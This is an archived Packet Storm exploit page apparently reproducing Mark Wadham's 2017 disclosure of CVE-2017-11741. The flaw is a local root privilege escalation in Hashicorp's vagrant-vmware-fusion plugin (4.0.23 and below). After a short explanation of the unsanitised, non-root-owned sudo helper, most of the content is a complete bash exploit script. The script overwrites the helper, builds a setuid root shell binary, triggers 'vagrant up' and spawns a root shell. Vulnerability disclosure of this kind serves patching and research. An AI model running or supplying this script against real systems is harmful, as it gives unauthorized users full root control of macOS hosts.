Exploit the possiblities

Hashicorp vagrant-vmware-fusion 4.0.23 Local Root Privilege Escalation

Hashicorp vagrant-vmware-fusion 4.0.23 Local Root Privilege Escalation
Posted Aug 3, 2017
Authored by Mark Wadham

Hashicorp vagrant-vmware-fusion versions 4.0.23 and below suffer from a local privilege escalation vulnerability.

tags | exploit, local
advisories | CVE-2017-11741
MD5 | 722af766c20d6b5f20bdb1b29bc26b37

Hashicorp vagrant-vmware-fusion 4.0.23 Local Root Privilege Escalation

Change Mirror Download
CVE-2017-11741 Local root privesc in Hashicorp vagrant-vmware-fusion <= 4.0.23
2 Aug 2017 06:49

A couple of weeks ago I disclosed a local root privesc in Hashicorp's vagrant-vmware-fusion plugin:

https://m4.rkw.io/blog/cve20177642-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4020.html

The initial patch they released was 4.0.21 which unfortunately contained a bug that prevented it from working at all on mac systems so I was unable to test it. I then had to give my mac to Apple for a couple of weeks for some repairs so only got around to testing 4.0.22 at the end of last week.

Unfortunately, 4.0.22 is still exploitable and the subsequent release of 4.0.23 did not fix the issue. Hashicorp reacted much faster this time, taking only a few days to issue a patch instead of a few months and 4.0.24 does fix the issue.
As discussed before the plugin installs a "sudo helper" encrypted ruby script and four architecture-specific wrappers into ~/.vagrant.d/gems/2.2.5/gems/vagrant-vmware-fusion-4.0.22/bin

vagrant_vmware_desktop_sudo_helper
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_386
vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64
vagrant_vmware_desktop_sudo_helper_wrapper_linux_386
vagrant_vmware_desktop_sudo_helper_wrapper_linux_amd64

The wrapper that matches the system architecture will be made suid root the first time any vagrant box is up'd. When a vagrant box is started the wrapper script elevates privileges and then executes the ruby sudo helper script.

Previously I exploited the unsanitised system("ruby") call to simply invoke the wrapper directly and execute an arbitrary fake "ruby" script in the current PATH.
This is now mitigated with 4.0.22 because the wrapper refuses to execute if it's not being called by vagrant.

Unfortunately it's still possible to exploit it because the wrapper executes the sudo helper as root, and the sudo helper is not root-owned so we can overwrite it with any arbitrary ruby code which will then get executed as root when vagrant up is run.

The issue was reported to Hashicorp on 27/07/17 and fixed on 01/08/17.

This exploit requires a vmware_fusion box to be present on the system in order to work. If you don't have one it may take a few minutes to download one. Like last time it targets darwin 64bit but it's likely the other architectures are vulnerable too.

https://m4.rkw.io/vagrant_vmware_privesc_4.0.23.sh.txt
81c2637cd1f4064c077aabc6fa7a3451ae3f2bd99c67f25c966728f88a89d5a1
--------------------------------------------------------------------------
#!/bin/bash
echo
echo "****************************************************************"
echo "* Wooo vmware_fusion plugin 4.0.22-4.0.23 is still exploitable *"
echo "* m4rkw *"
echo "****************************************************************"
echo
echo "Shouts to #coolkids"
echo

vuln_bin=`find ~/.vagrant.d/ -name vagrant_vmware_desktop_sudo_helper_wrapper_darwin_amd64 -perm +4000 |tail -n1`
target="/tmp/vagrant_vmware_privesc_4.0.23"

if [ "$vuln_bin" == "" ] ; then
echo "Vulnerable binary not found."
exit 1
fi

if [ -e "$target" ] ; then
echo "Exploit payload already present."
$target
exit
fi

box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1`

if [ "$box" == "" ] ; then
echo "No vmware_fusion boxes found locally, we will have to download one."
echo
echo "This will take a few minutes."
echo
box="bento/ubuntu-16.04"
fi

dir=`dirname "$vuln_bin"`

cd "$dir"

if [ ! -e "vagrant_vmware_desktop_sudo_helper.bak" ] ; then
mv vagrant_vmware_desktop_sudo_helper vagrant_vmware_desktop_sudo_helper.bak
fi

cat > $target.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","/bin/bash;rm -f $target",NULL);
return 0;
}
EOF
gcc -o $target $target.c
rm -f $target.c

cat > vagrant_vmware_desktop_sudo_helper <<EOF
#!/usr/bin/env ruby
\`chown root:wheel $target\`
\`chmod 4755 $target\`
EOF

chmod 755 vagrant_vmware_desktop_sudo_helper

cat > vagrantfile <<EOF
Vagrant.configure('2') do |config|
config.vm.box = '$box'
end
EOF

vagrant up 2>/dev/null &

while :
do
r=`ls -la $target |grep -- '-rwsr-xr-x 1 root wheel'`
if [ "$r" != "" ] ; then
break
fi
sleep 0.2
done

killall -9 vagrant

echo
echo "Sorry Hashicorp.. still fail :P"
echo

sleep 1
cd
$target
--------------------------------------------------------------------------


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    16 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    16 Files
  • 23
    Feb 23rd
    31 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close